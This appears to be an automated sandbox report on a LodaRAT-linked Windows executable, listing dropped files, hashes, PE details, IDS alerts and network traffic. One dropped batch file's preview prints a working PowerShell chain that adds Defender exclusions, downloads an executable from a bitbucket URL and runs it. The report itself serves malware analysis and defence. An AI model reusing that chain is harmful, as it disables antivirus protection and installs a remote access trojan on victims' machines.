                                Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                • 3.5.8.193
                                • 185.166.143.49

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\AppData\Local\Temp\AHPOBS.exe7uJ95NO82G.exeGet hashmaliciousLodaRATBrowse
                                  C:\Users\user\AppData\Roaming\Windata\svhost.exe7uJ95NO82G.exeGet hashmaliciousLodaRATBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\Gq48hjKhZf.exe
                                    File Type:ASCII text, with CRLF, LF line terminators
                                    Category:dropped
                                    Size (bytes):347
                                    Entropy (8bit):5.290067082162046
                                    Encrypted:false
                                    SSDEEP:6:NS0o++AI4eGgdEYzPs++AIIzVr+fxiA8q2pPKB++AI4eGgdEEFACp+tXzp3:NS9EsuUUEVr+ZiRsBEsuEJUtjN
                                    MD5:16E1A923C995AA08BDF178EF8DEE95D4
                                    SHA1:271758F6726EA175CC31F4845810E348B8CA75DB
                                    SHA-256:E54DCAAC4D1D94F6596EC6BB97D9D86E48C8C55C4F4130651D78CFEF49262C54
                                    SHA-512:62A8A2EFB82D78780417E3693B89EFC4C05592DF28C4490FD1B6A1B81E2D0FF50A07809CE2BCF06B0755BA79C1CC903B3EBD456B87385D0614AE545C8C0F8434
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat, Author: Joe Security
                                    Preview:@shift /0..@echo off.powershell /nop /com "Add-MpPreference -ExclusionPath %TEMP%".powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', '%TEMP%\AHPOBS.exe')";.powershell /nop /com "Add-MpPreference -ExclusionProcess %TEMP%\AHPOBS.exe".cmd.exe /c %TEMP%\AHPOBS.exe;..

                                    C:\Users\user\AppData\Local\Temp\AHPOBS.exe

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1136091
                                    Entropy (8bit):7.393176843129186
                                    Encrypted:false
                                    SSDEEP:24576:0RmJkcoQricOIQxiZY1iaPHwLDjz1yoVzUPbLwzmmhZJY5:RJZoQrbTFZY1iaPHUMoVzUPgpzJY5
                                    MD5:A9C526F3A276012D554AC382A90BCA3D
                                    SHA1:34CAB3F18D9A7EFA115E154609FDED0C2B96F9C8
                                    SHA-256:7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
                                    SHA-512:7C62FBDC6CB645B0A9056786ED3277A1016B47949F6193271A1474B573C4F7C3845E518BAB207C1D4E4D85AEE64BB4EC6CC5605534C3F6E52D24248007D4E5C1
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 74%
                                    • Antivirus: Virustotal, Detection: 71%, Browse
                                    Joe Sandbox View:
                                    • Filename: 7uJ95NO82G.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdufgvx5.yy4.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftigd2wu.d43.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pihhm4hj.s5g.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s35to0q4.bve.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slrztrq1.c4q.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgcum4jk.25m.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uul3lf3n.zkd.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1lm05v1.jnw.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkqimgzv.1zg.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z55gyxyv.bac.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Windata\svhost.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1136091
                                    Entropy (8bit):7.393176843129186
                                    Encrypted:false
                                    SSDEEP:24576:0RmJkcoQricOIQxiZY1iaPHwLDjz1yoVzUPbLwzmmhZJY5:RJZoQrbTFZY1iaPHUMoVzUPgpzJY5
                                    MD5:A9C526F3A276012D554AC382A90BCA3D
                                    SHA1:34CAB3F18D9A7EFA115E154609FDED0C2B96F9C8
                                    SHA-256:7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
                                    SHA-512:7C62FBDC6CB645B0A9056786ED3277A1016B47949F6193271A1474B573C4F7C3845E518BAB207C1D4E4D85AEE64BB4EC6CC5605534C3F6E52D24248007D4E5C1
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 74%
                                    • Antivirus: Virustotal, Detection: 71%, Browse
                                    Joe Sandbox View:
                                    • Filename: 7uJ95NO82G.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):6.461642473177525
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.64%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • VXD Driver (31/22) 0.01%
                                    File name:Gq48hjKhZf.exe
                                    File size:123'392 bytes
                                    MD5:454bf064c19d363b154a419fc69dc693
                                    SHA1:98beb972b52d32c846e9e485cbf17e9211cbe5ab
                                    SHA256:6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
                                    SHA512:4c87c628a5b8123faf35c9ef072e91463024f3429ee00998753bca58c77d34f31fd4b55afca7e4a4f25dff837e6db72df59f13f27430b1c16c0c13845b4e6df7
                                    SSDEEP:3072:kV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnP8B:Jt5hBPi0BW69hd1MMdxPe9N9uA069TBc
                                    TLSH:24C3276AB2E01198EBF581F6D5920746EB7074321715A3DB5B7863B31B2B8C58F3D3A0
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.b...|.................@.............................0.............................................

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x140001000
                                    Entrypoint Section:.code
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:
                                    Time Stamp:0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e

                                    Entrypoint Preview

                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    dec ecx
                                    mov eax, 00000160h
                                    dec eax
                                    xor edx, edx
                                    dec eax
                                    mov ecx, 40020444h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    call 00007F376CC138E8h
                                    dec eax
                                    xor ecx, ecx
                                    call 00007F376CC138E6h
                                    dec eax
                                    mov dword ptr [0001F420h], eax
                                    dec ebp
                                    xor eax, eax
                                    dec eax
                                    mov edx, 00001000h
                                    dec eax
                                    xor ecx, ecx
                                    call 00007F376CC138D3h
                                    dec eax
                                    mov dword ptr [0001F3FFh], eax
                                    dec eax
                                    mov eax, 4001F090h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    dec eax
                                    mov dword ptr [0001F43Eh], eax
                                    call 00007F376CC1E90Ah
                                    call 00007F376CC1E599h
                                    call 00007F376CC1A6C0h
                                    call 00007F376CC19CB3h
                                    call 00007F376CC19542h
                                    call 00007F376CC19211h
                                    call 00007F376CC18908h
                                    call 00007F376CC17DBFh
                                    call 00007F376CC139E2h
                                    call 00007F376CC1C8A5h
                                    call 00007F376CC1B104h
                                    dec eax
                                    mov edx, 4001F032h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    dec eax
                                    lea ecx, dword ptr [0001F3C6h]
                                    call 00007F376CC1E932h
                                    dec eax
                                    mov ecx, FFFFFFF5h

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1980xc8.data
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x630.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10d4.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x1f6a80x448.data
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .code0x10000x5a990x5c00bf90681e6a2fc3ae2cafaa536804f308False0.3649796195652174data5.470810722545147IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .text0x70000x105b50x106008a1a401c4bd106ea802d83f827d2ddd2False0.4909798425572519data6.359859898514709IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x180000x4b3d0x4c00546e073a6443174d5e09f21ab6d487ceFalse0.6635999177631579VAX-order 68k Blit mpx/mux executable6.6666895682624485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .pdata0x1d0000x10d40x1200e81bd35fde0f70c926459e823327da76False0.4683159722222222data4.881026996790752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x1f0000x23180x1600607c61f631092ad3ff4000c586299685False0.32848011363636365data4.298511113489139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x220000x6300x800fc2c7c1a0f7df25abface4beeca1c3d9False0.53125data5.902828763075756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_RCDATA0x2221c0x1very short file (no magic)9.0
                                    RT_RCDATA0x222200xezlib compressed data1.5714285714285714
                                    RT_RCDATA0x222300xcdata1.6666666666666667
                                    RT_RCDATA0x2223c0x151data1.032640949554896
                                    RT_MANIFEST0x223900x2a0XML 1.0 document, ASCII text, with very long lines (672), with no line terminators0.5520833333333334

                                    Imports

                                    DLLImport
                                    msvcrt.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                    KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                    SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                    WINMM.DLLtimeBeginPeriod
                                    OLE32.DLLCoInitialize, CoTaskMemFree
                                    SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                    USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                    GDI32.DLLGetStockObject
                                    COMCTL32.DLLInitCommonControlsEx

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-24T09:02:05.166648+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549982172.232.216.2504000TCP
                                    2024-12-24T09:02:05.166648+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549961172.232.216.2504000TCP
                                    2024-12-24T09:02:05.166648+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549983172.232.216.2504000TCP
                                    2024-12-24T09:02:05.166648+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549859172.232.216.2504000TCP
                                    2024-12-24T09:02:05.166648+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549808172.232.216.2504000TCP
                                    2024-12-24T09:02:05.166648+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549910172.232.216.2504000TCP
                                    2024-12-24T09:03:09.265641+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.549808172.232.216.2504000TCP
                                    2024-12-24T09:03:09.265641+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549808172.232.216.2504000TCP
                                    2024-12-24T09:03:31.346839+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549859172.232.216.2504000TCP
                                    2024-12-24T09:03:53.435333+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549910172.232.216.2504000TCP
                                    2024-12-24T09:04:15.523618+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549961172.232.216.2504000TCP
                                    2024-12-24T09:04:37.566783+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549982172.232.216.2504000TCP
                                    2024-12-24T09:04:59.614750+01002822116ETPRO MALWARE Loda Logger CnC Beacon1192.168.2.549983172.232.216.2504000TCP
                                    2024-12-24T09:04:59.614750+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.549983172.232.216.2504000TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 24, 2024 09:02:22.384614944 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:22.384680986 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:22.384771109 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:22.393671036 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:22.393702984 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:23.986958981 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:23.987221003 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:23.991286039 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:23.991334915 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:23.991667032 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:24.003436089 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:24.047342062 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:24.674854994 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:24.674882889 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:24.674940109 CET44349704185.166.143.49192.168.2.5
                                    Dec 24, 2024 09:02:24.674961090 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:24.675024986 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:24.679152966 CET49704443192.168.2.5185.166.143.49
                                    Dec 24, 2024 09:02:24.968708038 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:24.968750954 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:24.968967915 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:24.969502926 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:24.969515085 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:26.384061098 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:26.384221077 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:26.386399031 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:26.386420012 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:26.386663914 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:26.387736082 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:26.435339928 CET443497053.5.8.193192.168.2.5
